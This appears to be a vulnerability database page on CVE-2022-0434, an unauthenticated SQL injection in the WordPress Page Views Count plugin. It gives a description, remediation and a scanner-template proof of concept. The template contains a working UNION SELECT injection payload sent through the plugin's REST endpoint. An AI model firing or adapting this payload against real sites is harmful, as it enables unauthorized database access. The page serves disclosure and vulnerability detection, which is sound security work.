CVE-2022-0434: WordPress Page Views Count <2.4.15 - SQL Injection

日期: 2025-08-01 | 影响软件: WordPress | POC: 已公开

漏洞描述

WordPress Page Views Count plugin prior to 2.4.15 contains an unauthenticated SQL injection vulnerability. It does not sanitise and escape the post_ids parameter before using it in a SQL statement via a REST endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

PoC代码[已公开]

id: CVE-2022-0434

info:
  name: WordPress Page Views Count <2.4.15 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    WordPress Page Views Count plugin prior to 2.4.15 contains an unauthenticated SQL injection vulnerability.  It does not sanitise and escape the post_ids parameter before using it in a SQL statement via a REST endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database.
  remediation: |
    Update to the latest version of the WordPress Page Views Count plugin (2.4.15) to mitigate the SQL Injection vulnerability.
  reference:
    - https://wpscan.com/vulnerability/be895016-7365-4ce4-a54f-f36d0ef2d6f1
    - https://wordpress.org/plugins/page-views-count/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0434
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0434
    cwe-id: CWE-89
    epss-score: 0.88588
    epss-percentile: 0.9948
    cpe: cpe:2.3:a:a3rev:page_view_count:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: a3rev
    product: page_view_count
    framework: wordpress
  tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wpscan,unauth,a3rev
variables:
  num: "999999999"

http:
  - raw:
      - |
        GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5({{num}}),null,null%20--%20g HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100965218eaff0b4fc5a828853c224f8c6f4b65825b72de6d2fd8516d088ff6c981022100ce416e8570c56a54cfbfd58f903498caeb26fd4c0969b5eab137dc5cfed57216:922c64590222798bb761d5b6d8e72950

相关漏洞推荐